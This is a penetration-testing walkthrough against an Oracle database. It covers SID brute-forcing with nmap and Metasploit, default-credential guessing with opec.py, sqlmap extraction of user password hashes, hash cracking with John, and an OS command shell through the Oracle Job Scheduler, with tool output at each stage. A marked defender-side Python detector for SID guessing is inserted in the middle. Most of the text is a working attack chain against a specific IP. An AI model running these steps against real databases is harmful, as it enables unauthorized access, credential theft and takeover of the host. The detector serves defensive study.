Oracle Database

SID Enumeration

Nmap SID Enumeration:

>>> sudo nmap 167.172.146.34 -p 1521 -sS --script oracle-sid-brute
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-30 18:20 EDT
Nmap scan report for 167.172.146.34
Host is up (0.010s latency).

PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-sid-brute: 
|_  XE

MSF SID Enumeration:

>>> msfconsole -q
msf5 > use auxiliary/scanner/oracle/sid_brute
msf5 auxiliary(scanner/oracle/sid_brute) > setg RHOSTS 167.172.146.34
RHOSTS => 167.172.146.34
msf5 auxiliary(scanner/oracle/sid_brute) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/oracle/sid_brute) > run

[*] 167.172.146.34:1521   - Checking 571 SIDs against 167.172.146.34:1521
[+] 167.172.146.34:1521   - 167.172.146.34:1521 Oracle - 'XE' is valid
[+] 167.172.146.34:1521   - 167.172.146.34:1521 Oracle - 'PLSEXTPROC' is valid
[*] 167.172.146.34:1521   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
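An added defender-side example, not code from the original page: a small Python detector that flags the SID-guessing pattern shown above in a text-format Oracle listener.log, where each connection attempt is logged with the requested SID, the client address and a TNS return code (0 when accepted, 12505 when the listener does not know the SID). The log lines are constructed, and the field layout is an assumption about the classic text listener.log format rather than something the page states.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed text listener.log layout (not taken from the page):
#   <ts> * (CONNECT_DATA=(SID=..)..) * (ADDRESS=..(HOST=..)..) * establish * <sid> * <rc>
# rc 0 = accepted, rc 12505 = listener does not know that SID (bulk SID guessing leaves many).
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=\((?:SID|SERVICE_NAME)=(?P<sid>[^)]*)\).*?\) \* "
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\)\(PORT=\d+\)\) \* "
    r"establish \* [^*]* \* (?P<rc>\d+)$"
)

def detect_sid_bruteforce(lines, max_sids=5, window=timedelta(minutes=5)):
    """Return {client_host: sorted SIDs} for clients that asked for more than
    max_sids distinct SIDs inside one window and received at least one 12505."""
    attempts = defaultdict(list)  # client host -> [(timestamp, sid, rc)]
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:  # continuation lines such as "TNS-12505: ..." carry no fields
            continue
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
        attempts[m["host"]].append((ts, m["sid"], int(m["rc"])))
    alerts = {}
    for host, events in attempts.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):  # slide the window over each start
            burst = [e for e in events[i:] if e[0] - start <= window]
            sids = {sid for _, sid, _ in burst}
            if len(sids) > max_sids and any(rc == 12505 for _, _, rc in burst):
                alerts[host] = sorted(sids)
                break
    return alerts

def _entry(ts, sid, host, rc):  # one constructed listener.log line in the layout above
    return (f"{ts} * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * "
            f"(ADDRESS=(PROTOCOL=tcp)(HOST={host})(PORT=51000)) * establish * {sid} * {rc}")

SAMPLE_LOG = [  # constructed: one scanner cycling through SID guesses, one normal client
    _entry("30-JUL-2020 18:20:01", "ORCL", "10.0.0.5", 12505),
    "TNS-12505: TNS:listener does not currently know of SID given in connect descriptor",
    _entry("30-JUL-2020 18:20:01", "XE", "10.0.0.5", 0),
    _entry("30-JUL-2020 18:20:02", "PROD", "10.0.0.5", 12505),
    _entry("30-JUL-2020 18:20:02", "TEST", "10.0.0.5", 12505),
    _entry("30-JUL-2020 18:20:03", "DEV", "10.0.0.5", 12505),
    _entry("30-JUL-2020 18:20:03", "ORA11", "10.0.0.5", 12505),
    _entry("30-JUL-2020 18:25:10", "XE", "10.0.0.9", 0),
]
```

Running `detect_sid_bruteforce(SAMPLE_LOG)` reports only 10.0.0.5, the host that cycled through six SIDs in two seconds; the single accepted connection from 10.0.0.9 is left alone.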

User/Password Enumeration

>>> python3 opec.py -t 167.172.146.34 -s XE

[i] Creating privilege escalation report ./logs/opec-privesc-log-2020-Jul-30_19-03-52.log
[*] Testing commencing.
[i] Enter CNTRL+C at any time to stop brute forcing default credentials
[i] Checked 10 of 169 accounts
[i] Checked 20 of 169 accounts
[i] Checked 30 of 169 accounts
[i] Checked 40 of 169 accounts
[+] Default account credentials:	 FROSTY/SNOWMAN
[i] Checked 50 of 169 accounts
[i] Checked 60 of 169 accounts
[i] Checked 70 of 169 accounts
[i] Checked 80 of 169 accounts
[i] Checked 90 of 169 accounts
[i] Checked 100 of 169 accounts
[i] Checked 110 of 169 accounts
[i] Checked 120 of 169 accounts
[i] Checked 130 of 169 accounts
[i] Checked 140 of 169 accounts
[i] Checked 150 of 169 accounts
[i] Checked 160 of 169 accounts

Connection to Database

Using SQLPlus:


Using SQLMAP:

>>> sqlmap -d oracle://FROSTY:SNOWMAN@167.172.146.34:1521/XE -a --flush-session
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:16:12 /2020-07-30/

[20:16:13] [INFO] flushing session file
[20:16:13] [INFO] connection to Oracle server '167.172.146.34:1521' established
[20:16:13] [INFO] testing Oracle
[20:16:13] [INFO] confirming Oracle
[20:16:13] [INFO] the back-end DBMS is Oracle
[20:16:13] [INFO] fetching banner
back-end DBMS: Oracle
banner: 'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production'
[20:16:13] [INFO] fetching current user
current user: 'FROSTY'
[20:16:13] [INFO] fetching current database
[20:16:13] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current database (equivalent to schema on Oracle): 'FROSTY'
[20:16:13] [INFO] fetching server hostname
hostname: 'localhost.localdomain'
[20:16:13] [INFO] testing if current user is DBA
current user is DBA: True
[20:16:13] [INFO] fetching database users
database management system users [13]:
[*] ANONYMOUS
[*] APEX_040000
[*] APEX_PUBLIC_USER
[*] CTXSYS
[*] FLOWS_FILES
[*] FROSTY
[*] HR
[*] MDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] XDB
[*] XS$NULL

[20:16:13] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:16:16] [INFO] writing hashes to a temporary file '/tmp/sqlmapoq9zmkay9814/sqlmaphashes-if2xq68v.txt' 

Cracking Hashes

Cracking Hashes with John:

>>> john /tmp/sqlmapoq9zmkay9814/sqlmaphashes-if2xq68v.txt --wordlist=/opt/Hacking/Enumeration/SecurityLists/Passwords/rockyou.txt --format=oracle 
Using default input encoding: UTF-8
Loaded 12 password hashes with 12 different salts (oracle, Oracle 10 [DES 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ORACLE           (XDB)
ORACLE           (CTXSYS)
SNOWMAN          (FROSTY)
3g 0:00:01:41 DONE (2020-07-30 20:19) 0.02969g/s 141961p/s 1278Kc/s 1278KC/s "CATRINA"..*7¡VAMOS!

RCE

Use option 7 of the opec.py shell menu, which runs each command as an Oracle Job Scheduler job, to launch a shell:

>>> opec.py -t 192.168.89.2 -s ORCL -u SYS -p password1 -m s
[i] Please select from the following options:

[1] Get current privilege information
[2] Get procedures and functions information
[3] Get dangerous package information
[4] Launch a SQL shell at the current privilege level
[5] Launch the data browser for viewing row-level data
[6] Launch an OS commanding shell via Java (this will write files on host OS)
[7] Launch an OS commanding shell via the Job Scheduler (this will write files on host OS)
[8] Deploy a simple port scanner package
[9] Launch a privilege escalation session as the current user
[10] Exit shell mode


Your selection: 7
[i] x86_64/Linux 2.4.xx
[i] Linux OS inferred
[i] Oracle version 11
[i] Error:


CREATE DIRECTORY MY_DIR2346E AS '/tmp/'
                 *

ERROR at line 1:

ORA-00955: name is already used by an existing object


[i] CREATE DIRECTORY MY_DIR2346E AS '/tmp/'                 *ERROR at line 1:ORA-00955: name is already used by an existing object
[i] Grant succeeded.
[i] Grant succeeded.
[i] Please note:                           
[i]  - Each command is executed as an individual scheduled job     
[i]  - State is not maintained between shell commands              
[i]  - Please exit the shell correctly so OPEC can remove any files


[+] Launching shell - type exit and press return to escape the shell
  > hostname
  localhost.localdomain
  > id
  uid=1002(oracle) gid=1002(dba) groups=1002(dba) context=unconfined_u:system_r:initrc_t:s0